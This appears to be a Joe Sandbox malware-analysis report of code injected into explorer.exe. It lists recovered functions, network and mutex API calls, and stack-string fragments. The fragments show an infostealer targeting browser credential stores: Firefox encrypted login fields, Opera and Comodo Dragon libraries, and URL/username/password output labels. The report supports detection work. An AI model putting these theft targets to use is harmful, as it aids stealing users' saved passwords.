Snapshot File: hcaresult_10_2_f820000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: dfe0bf690768215550c25f894d0b9667aca9f800bb3de60df5cae41d297ee3a0
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 6B21C370610B0D9ECF05EFA8C8847ED7BE0FF59205F40421AD45ADB246DE788609C78A

Function 0F8E5B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 0F8E5CCA

Strings

.dll, xrefs: 0F8E5BCD
el32, xrefs: 0F8E5BA0
kern, xrefs: 0F8E5B99

Memory Dump Source

Source File: 0000000A.00000002.2433679563.000000000F820000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f820000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: e708bd2e8ce04057148e2c86f00152f30314dbcdc3f168620c2b347d0fd5c29e
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: 25416C70918A088FDB94EFA8C4D87ED77E0FB98304F44417AD84EDB25ADE349945CB85

Function 0F8E5B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 0F8E5CCA

Strings

.dll, xrefs: 0F8E5BCD
el32, xrefs: 0F8E5BA0
kern, xrefs: 0F8E5B99

Memory Dump Source

Source File: 0000000A.00000002.2433679563.000000000F820000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f820000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: 84b711daf933b5016cd73956dd46c6440e433f4dc83a463a3600e52496ca4fbd
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: C0412B70918A088FDB94EFA8C4987ED77F0FB58300F44417AC94EDB256DE349945CB85

Function 0F8EB72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0F8EB791

Strings

ect, xrefs: 0F8EB761
conn, xrefs: 0F8EB75A

Memory Dump Source

Source File: 0000000A.00000002.2433679563.000000000F820000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f820000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: 6b942271bb1382b3edc775098ecfb84659bdf61bf097bd45c99a0259682df065
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: 19015E30618B188FCB84EF1CE088B55B7E0FB59314F1545AED90DCB226C674D8818BC2

Function 0F8EB732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0F8EB791

Strings

ect, xrefs: 0F8EB761
conn, xrefs: 0F8EB75A

Memory Dump Source

Source File: 0000000A.00000002.2433679563.000000000F820000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f820000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: c0244dd0d1c90f8e5d8fb618938a5b2e6160df71b7f331dabad3502a92845310
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: 02012C70618A1C8FCB88EF5CE488B55B7E0FB59314F1541AEA80DCB226CA74C9818BC2

Function 0F8EB6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 0F8EB713

Strings

send, xrefs: 0F8EB6DA

Memory Dump Source

Source File: 0000000A.00000002.2433679563.000000000F820000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f820000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: c6fafd82c0dac487b1f3bef93b874a80ba921bfd4f25dc031909ca64cd781444
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: 11011270518A188FDBC8EF1CD488B6577E0EB59314F1645AED85DCB266C670D8818B81

Function 0F8EB5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 0F8EB611

Strings

sock, xrefs: 0F8EB5D9

Memory Dump Source

Source File: 0000000A.00000002.2433679563.000000000F820000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f820000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: 6997bf52609c1677ef6bc08cf76ca356f82b103dfe6322e822f4126480f6efd2
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: 63012C70618A188FCB84EF1CE048B54BBE0FB59314F1545AEE85ECB266C7B4C9818B86

Function 0F8E32DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0F8E332D

Memory Dump Source

Source File: 0000000A.00000002.2433679563.000000000F820000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f820000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: 9239222ed20ea99c46e3666982e4e08359e1c26c2985b91f0c9eae443e342715
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: 93316E74614B09EBDB68EF6990486E5BBA0FB55300F84427EC91DCF107CB74A854CF92

Function 0F8E3412 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 0F8E3461

Memory Dump Source

Source File: 0000000A.00000002.2433679563.000000000F820000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f820000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: d467c680a0b0013d3b690581b0938c7d175a48baf5468ab13fd89087e7b3e693
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: EDF04630228B084FD788EF2CD48567AF3D0FBE9204F44063EA94DC7221CA38C5814706

Non-executed Functions

Function 0E06FD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

el32, xrefs: 0E06FF27
32.d, xrefs: 0E06FF0B
net., xrefs: 0E06FF44
wini, xrefs: 0E06FF72
user, xrefs: 0E06FF03
S, xrefs: 0E070073
ll, xrefs: 0E06FF13
M, xrefs: 0E070082
dll, xrefs: 0E06FF4C
.dll, xrefs: 0E06FF2F
kern, xrefs: 0E06FF5A

Memory Dump Source

Source File: 0000000A.00000002.2433390421.000000000DFB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfb0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 64211ad3b4fc12b0f931d3a511a2878e88d48c66a4b5c8df6e49ef899868dd1d
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: 8BE14A70618B488FC769EF68C4947EBB7E0FB58300F504A2E959FC7245DF30A9418B89

Function 0E3F4D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

32.d, xrefs: 0E3F4F0B
net., xrefs: 0E3F4F44
wini, xrefs: 0E3F4F72
user, xrefs: 0E3F4F03
S, xrefs: 0E3F5073
M, xrefs: 0E3F5082
el32, xrefs: 0E3F4F27
.dll, xrefs: 0E3F4F2F
kern, xrefs: 0E3F4F5A
ll, xrefs: 0E3F4F13
dll, xrefs: 0E3F4F4C

Memory Dump Source

Source File: 0000000A.00000002.2433563442.000000000E3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 28a149a5d82b5db21da03710b853ae257ba7ee646bce87004d219bd6f1d02d78
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: BFE15B70518F488FC764EF68C494BABBBE1FB98300F504A2ED59BC7251DF30A9458B85

Function 0E072792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

Subm, xrefs: 0E072855
itUR, xrefs: 0E07285D
encr, xrefs: 0E0728D2
dPas, xrefs: 0E0728E2
Fiel, xrefs: 0E072884
guid, xrefs: 0E0727CE
d, xrefs: 0E0728F2
user, xrefs: 0E072876
name, xrefs: 0E07287D
rnam, xrefs: 0E0728B5
form, xrefs: 0E07284D
encr, xrefs: 0E07289D
ypte, xrefs: 0E0728DA
e, xrefs: 0E0728BD
dUse, xrefs: 0E0728AD
swor, xrefs: 0E0728EA
ypte, xrefs: 0E0728A5

Memory Dump Source

Source File: 0000000A.00000002.2433390421.000000000DFB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfb0000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: ef650ecc860c15e79aff4b9fb96e5baf9e60b01cb0b6b9b4eb23cee9cf3aa43c
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 75B14B70A18B488FDB55EF68C485AEEB7F1FF98300F50491ED49AC7261EF7099058B86

Function 0E3F7792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

encr, xrefs: 0E3F78D2
Fiel, xrefs: 0E3F7884
itUR, xrefs: 0E3F785D
encr, xrefs: 0E3F789D
Subm, xrefs: 0E3F7855
dPas, xrefs: 0E3F78E2
rnam, xrefs: 0E3F78B5
ypte, xrefs: 0E3F78A5
form, xrefs: 0E3F784D
name, xrefs: 0E3F787D
d, xrefs: 0E3F78F2
ypte, xrefs: 0E3F78DA
user, xrefs: 0E3F7876
dUse, xrefs: 0E3F78AD
e, xrefs: 0E3F78BD
swor, xrefs: 0E3F78EA
guid, xrefs: 0E3F77CE

Memory Dump Source

Source File: 0000000A.00000002.2433563442.000000000E3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d0000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: b365fc4c301d8964b882d2d31747bcb440cc4eb1c2bfe40c5704e606d5aa3fc5
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 93B16930618B488EDB55EF68C485AEEBBF1FF98300F50491ED59AC7261EF7099058B86

Function 0E070622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

e, xrefs: 0E07066D
c, xrefs: 0E070697
w, xrefs: 0E0706B3
n, xrefs: 0E0706C1
l, xrefs: 0E070682
u, xrefs: 0E070661
l, xrefs: 0E0706AC
n, xrefs: 0E0706BA
p, xrefs: 0E070690
i, xrefs: 0E07069E
d, xrefs: 0E0706CF
d, xrefs: 0E07067B
s, xrefs: 0E070689
t, xrefs: 0E0706C8
l, xrefs: 0E0706D6
d, xrefs: 0E0706A5
2, xrefs: 0E070674

Memory Dump Source

Source File: 0000000A.00000002.2433390421.000000000DFB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfb0000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: 863f62618fbc275eb3d14c152e9162459d38471e79ce4dc0f2f0bdbc6107e6c0
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: 2E41BD70E18B088FDB14DF98E8466AE7BE6FB88740F00025ED849D3245DBB59D45CBDA

Function 0E3F5622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

l, xrefs: 0E3F56D6
w, xrefs: 0E3F56B3
n, xrefs: 0E3F56C1
l, xrefs: 0E3F5682
l, xrefs: 0E3F56AC
p, xrefs: 0E3F5690
i, xrefs: 0E3F569E
t, xrefs: 0E3F56C8
d, xrefs: 0E3F567B
e, xrefs: 0E3F566D
c, xrefs: 0E3F5697
u, xrefs: 0E3F5661
d, xrefs: 0E3F56CF
n, xrefs: 0E3F56BA
2, xrefs: 0E3F5674
d, xrefs: 0E3F56A5
s, xrefs: 0E3F5689

Memory Dump Source

Source File: 0000000A.00000002.2433563442.000000000E3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d0000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: 572700d7c92f19d6786dc6b6361e61d1d6fbb80c07e69917245ac80b96aab8ce
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: 8A41BE70A18B08DFDB14DF88A8457BE7BE2FB88700F00025EE909D7245DBB59D498BD6

Function 0E077AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

D, xrefs: 0E077CDA
b, xrefs: 0E077C73
], xrefs: 0E077CA8
c, xrefs: 0E077C0B
n, xrefs: 0E077C98
], xrefs: 0E077C3D
[, xrefs: 0E077CCD
[, xrefs: 0E077C90
[, xrefs: 0E077BF6
l, xrefs: 0E077C35
[, xrefs: 0E077C66
l, xrefs: 0E077CE2
[, xrefs: 0E077C2D
e, xrefs: 0E077CA0

Memory Dump Source

Source File: 0000000A.00000002.2433390421.000000000DFB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfb0000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: a37a9af964c1d416c89d99bafa461fbc01f9b286c9968a71df42e761b5c161fa
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: B4C17C70618B089FC759EF64C495AEAF3E1FB98304F444B2E949EC7210DF30A915CB8A

Function 0E3FCAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

[, xrefs: 0E3FCC90
n, xrefs: 0E3FCC98
[, xrefs: 0E3FCBF6
l, xrefs: 0E3FCC35
e, xrefs: 0E3FCCA0
[, xrefs: 0E3FCC66
[, xrefs: 0E3FCCCD
D, xrefs: 0E3FCCDA
b, xrefs: 0E3FCC73
], xrefs: 0E3FCCA8
[, xrefs: 0E3FCC2D
l, xrefs: 0E3FCCE2
], xrefs: 0E3FCC3D
c, xrefs: 0E3FCC0B

Memory Dump Source

Source File: 0000000A.00000002.2433563442.000000000E3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d0000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: 7bd8139acbf2c20e3320948d59b51ca9e2274933dd0f8e3ee03c304d8f8968de
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: 8DC15A71218B09CFC758EF64C499AEAF7E1FB94304F404B2AD59AC7210DF30A915CB86

Function 0E077F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

n, xrefs: 0E077F6B
c, xrefs: 0E077FC8
r, xrefs: 0E077F98
r, xrefs: 0E077FB8
r, xrefs: 0E077FB0
., xrefs: 0E077F63
r, xrefs: 0E077F90
r, xrefs: 0E077FA8
r, xrefs: 0E077F88
r, xrefs: 0E077FA0
r, xrefs: 0E077FC0
0, xrefs: 0E077F5B

Memory Dump Source

Source File: 0000000A.00000002.2433390421.000000000DFB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfb0000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: f827a3a86f016abe5c4af687a433259d642cede8b6553bd63afe748ac12de16a
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: 4751D0316187488FD759DF18C8852EAB7E5FBC4300F505A2EE8CBC7242DBB49906CB86

Function 0E3FCF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

r, xrefs: 0E3FCF90
r, xrefs: 0E3FCFA0
r, xrefs: 0E3FCFB8
r, xrefs: 0E3FCF88
r, xrefs: 0E3FCFC0
c, xrefs: 0E3FCFC8
r, xrefs: 0E3FCF98
r, xrefs: 0E3FCFB0
n, xrefs: 0E3FCF6B
0, xrefs: 0E3FCF5B
r, xrefs: 0E3FCFA8
., xrefs: 0E3FCF63

Memory Dump Source

Source File: 0000000A.00000002.2433563442.000000000E3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d0000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 1fba8b48ab540f0b26f0da2fd0faa48e3fbbdd0b5a36297d948260419e2728bf
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: 1251D1312187488FD719DF18D8857AABBE5FBC4300F501A2EE9CBC7251DBB49906CB82

Function 0E0712F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

dll, xrefs: 0E07132E
cli., xrefs: 0E071327
opera_browser.dll, xrefs: 0E071629
dragon_s.dll, xrefs: 0E071614
nspr, xrefs: 0E0714D4
4.dl, xrefs: 0E0714DB
l, xrefs: 0E0714E2
sspi, xrefs: 0E071320

Memory Dump Source

Source File: 0000000A.00000002.2433390421.000000000DFB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfb0000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: e6d0c6ac62f8609763f27567d394464f349bd6c4b9b3b9451b787feffd144db9
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: C3C19270A18A198FC758EF68D455AEAB3E1FB98300F944729948EC7251DF30EE4187C9

Function 0E0712F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

dll, xrefs: 0E07132E
cli., xrefs: 0E071327
opera_browser.dll, xrefs: 0E071629
dragon_s.dll, xrefs: 0E071614
nspr, xrefs: 0E0714D4
4.dl, xrefs: 0E0714DB
l, xrefs: 0E0714E2
sspi, xrefs: 0E071320

Memory Dump Source

Source File: 0000000A.00000002.2433390421.000000000DFB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfb0000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: f26a99e3e60b0f5120ee22b222e3af6e74da64ba1744f088d5047f79084677e6
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: DDC19170A18A198FC758EF68D495AEAB3E1FB98300F954729948EC7251DF30EE418789

Function 0E3F62F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

dll, xrefs: 0E3F632E
opera_browser.dll, xrefs: 0E3F6629
sspi, xrefs: 0E3F6320
l, xrefs: 0E3F64E2
4.dl, xrefs: 0E3F64DB
dragon_s.dll, xrefs: 0E3F6614
cli., xrefs: 0E3F6327
nspr, xrefs: 0E3F64D4

Memory Dump Source

Source File: 0000000A.00000002.2433563442.000000000E3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d0000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 5367809df95f5dcdb1419a71eebb65a5a8e0c76ed92f443e7afd74c25e6eb33b
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: 5EC19E70618A198FCB58EF68D455AAAFBE1FB98300F914729C94EC7255DF30EE018BC5

Function 0E3F62F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

dll, xrefs: 0E3F632E
opera_browser.dll, xrefs: 0E3F6629
sspi, xrefs: 0E3F6320
l, xrefs: 0E3F64E2
4.dl, xrefs: 0E3F64DB
dragon_s.dll, xrefs: 0E3F6614
cli., xrefs: 0E3F6327
nspr, xrefs: 0E3F64D4

Memory Dump Source

Source File: 0000000A.00000002.2433563442.000000000E3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d0000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: 4027dd1c79986ff85c6d08489a9241d18a7fb4e75339d9b96959952de5b9b87c
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 90C19E70618A198FC758EF68D495AAAFBE1FB98300F914729C94EC7255DF30EE018BC5

Function 0E072CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

2, xrefs: 0E072DE1
L: , xrefs: 0E072D66
Pass, xrefs: 0E072D97
name, xrefs: 0E072DB2
User, xrefs: 0E072DAB
UR, xrefs: 0E072D5F
word, xrefs: 0E072D9E

Memory Dump Source

Source File: 0000000A.00000002.2433390421.000000000DFB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfb0000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 93345921dfc238ca3a54380bf01e13fdc4c8227925ff387ed5d3cbe0eac4a9aa
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: 3CA17070A187488BDB19EFA8D444BEEB7F1FF98300F404A2DD48AD7251EB749945C789

Function 0E3F7CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

L: , xrefs: 0E3F7D66
UR, xrefs: 0E3F7D5F
name, xrefs: 0E3F7DB2
User, xrefs: 0E3F7DAB
2, xrefs: 0E3F7DE1
Pass, xrefs: 0E3F7D97
word, xrefs: 0E3F7D9E

Memory Dump Source

Source File: 0000000A.00000002.2433563442.000000000E3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d0000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: a61e045e29adf62f914820ceed3f53f2fb64649306cdbc5e9899ad0ba266b3b8
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: 7AA18170618748CBDB19EFA8D444BEEBBE1FF98300F40462ED58AD7251EF7099458785

Function 0E072CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

2, xrefs: 0E072DE1
L: , xrefs: 0E072D66
Pass, xrefs: 0E072D97
name, xrefs: 0E072DB2
User, xrefs: 0E072DAB
UR, xrefs: 0E072D5F
word, xrefs: 0E072D9E

Memory Dump Source

Source File: 0000000A.00000002.2433390421.000000000DFB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DFB0000, based on PE: false

Joe Sandbox IDA Plugin

